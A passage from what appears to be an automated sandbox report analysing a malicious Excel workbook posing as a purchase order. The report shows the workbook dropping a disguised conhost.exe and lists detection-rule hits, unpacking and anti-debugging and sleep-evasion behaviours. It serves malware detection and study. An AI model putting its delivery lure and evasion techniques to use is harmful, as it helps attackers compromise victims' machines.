name="_xlnm.Auto_Open">ProtectList2!$A$1</definedName></definedNames><calcPr calcId="152511"/></workbook>
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00428DB0 appears 62 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00523144 appears 304 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00539000 appears 51 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 004326F9 appears 149 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00429D60 appears 43 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00412EF4 appears 350 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00539FB0 appears 39 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 0042962A appears 34 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00428DB0 appears 62 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00523144 appears 304 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00539000 appears 51 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 004326F9 appears 149 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00429D60 appears 43 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00412EF4 appears 350 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 00539FB0 appears 39 times
Source: C:\ETTER\dAneDFma\conhost.exeCode function: String function: 0042962A appears 34 times
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engineClassification label: mal100.expl.evad.winXLSM@3/10@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PURCHASE ORDER No-17-11-98543.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PURCHASE ORDER No-17-11-98543.xlsmJump to behavior
Source: C:\ETTER\dAneDFma\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\user-PC
Source: C:\ETTER\dAneDFma\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\user-PC
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREF9B.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREF9B.tmpJump to behavior
Source: C:\ETTER\dAneDFma\conhost.exeCommand line argument: n|D
Source: C:\ETTER\dAneDFma\conhost.exeCommand line argument: n|D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\ETTER\dAneDFma\conhost.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\ETTER\dAneDFma\conhost.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PURCHASE ORDER No-17-11-98543.xlsmVirustotal: Detection: 9%
Source: PURCHASE ORDER No-17-11-98543.xlsmVirustotal: Detection: 9%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: PURCHASE ORDER No-17-11-98543.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: PURCHASE ORDER No-17-11-98543.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\ETTER\dAneDFma\conhost.exeUnpacked PE file: 3.2.conhost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ETTER\dAneDFma\conhost.exeUnpacked PE file: 3.2.conhost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\ETTER\dAneDFma\conhost.exeUnpacked PE file: 3.2.conhost.exe.400000.0.unpack
Source: C:\ETTER\dAneDFma\conhost.exeUnpacked PE file: 3.2.conhost.exe.400000.0.unpack
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0044E69D push esi; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0044B3FE pushad ; retn 0044h
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0044B4F6 push eax; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429588 push ecx; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429DA6 push ecx; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_002FA54D pushad ; iretd
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_002FAFCA push cs; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005397D8 push ecx; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0044E69D push esi; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0044B3FE pushad ; retn 0044h
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0044B4F6 push eax; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429588 push ecx; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429DA6 push ecx; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_002FA54D pushad ; iretd
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_002FAFCA push cs; ret
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005397D8 push ecx; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ETTER\dAneDFma\conhost.exeJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ETTER\dAneDFma\conhost.exeJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloaderJump to dropped file
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00428808 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00428808 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040D772
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040D772
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043FF74 FindFirstFileExW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005501C4 FindFirstFileExW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043FF74 FindFirstFileExW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005501C4 FindFirstFileExW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040D46C GetSystemInfo,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040D46C GetSystemInfo,
Source: C:\ETTER\dAneDFma\conhost.exeProcess queried: DebugPort
Source: C:\ETTER\dAneDFma\conhost.exeProcess queried: DebugPort
Source: C:\ETTER\dAneDFma\conhost.exeProcess queried: DebugPort
Source: C:\ETTER\dAneDFma\conhost.exeProcess queried: DebugPort
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004037EA LdrInitializeThunk,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004037EA LdrInitializeThunk,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043635F mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040460E mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004037CB mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043D8E8 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043D8A2 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043D91B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_002F8EF3 push dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005465AF mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051485E mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051092B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00510D90 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00513A1B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054DAF2 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054DB6B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054DB38 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043635F mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0040460E mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004037CB mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043D8E8 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043D8A2 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043D91B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_002F8EF3 push dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005465AF mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051485E mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0051092B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00510D90 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00513A1B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054DAF2 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054DB6B mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0054DB38 mov eax, dword ptr fs:[00000030h]
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00440C62 GetProcessHeap,
